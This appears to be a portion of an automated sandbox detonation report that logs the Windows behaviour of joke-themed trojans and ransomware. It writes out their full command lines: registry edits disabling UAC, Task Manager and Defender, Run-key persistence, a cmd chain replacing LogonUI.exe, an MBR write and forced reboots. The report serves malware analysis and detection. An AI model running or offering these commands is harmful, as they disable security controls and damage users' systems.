Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\c:\windows\WinAttr.gci | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\windows\WinAttr.gci | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
(this rundll32.exe command line was launched 35 times with identical arguments)
C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe"
C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe"
C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\windows\SysWOW64\takeown.exe
"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe
C:\windows\SysWOW64\icacls.exe
"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit
C:\Windows\SysWOW64\takeown.exe
takeown /f LogonUI.exe
C:\Windows\SysWOW64\icacls.exe
icacls LogonUI.exe /granted "Admin":F
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "tobi0a0c.exe"
Network
| Country | Destination | Domain | Proto |
| US | 150.171.27.10:443 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 95.101.143.34:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs
C:\Users\Admin\Desktop\YOUDIED 5.txt
C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd
C:\Users\Admin\AppData\Local\Temp\783D.tmp\bg.bmp
C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe
C:\Users\Admin\AppData\Local\Temp\783D.tmp\mainbgtheme.wav
C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe
C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:19
Platform
win11-20241007-en
Max time kernel
300s
Max time network
230s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:14
Platform
win11-20241007-en
Max time kernel
11s
Max time network
14s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\425634766\3423304070.pri | C:\Windows\system32\LogonUI.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"
C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
"covid20.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
"HorrorBob2.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
"HorrorRansom 1.0 Final.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
"HorrorTrojan Ultimate Edition.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
"HorrorTrojan123.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
clwcp c:\covid20\bg.bmp
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
flasher 5 c:\covid20\covid.bmp
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d
C:\Windows\SysWOW64\cscript.exe
cscript prompt.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
(this DllHost.exe command line was launched 5 times with identical arguments)
Network
Files
C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd
C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs
C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe
C:\Users\Admin\AppData\Local\Temp\C18B.tmp\note.bmp
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\bg.bmp
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bmp
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs
C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat
C:\Users\Admin\AppData\Local\Temp\C498.tmp\blood.bmp
C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe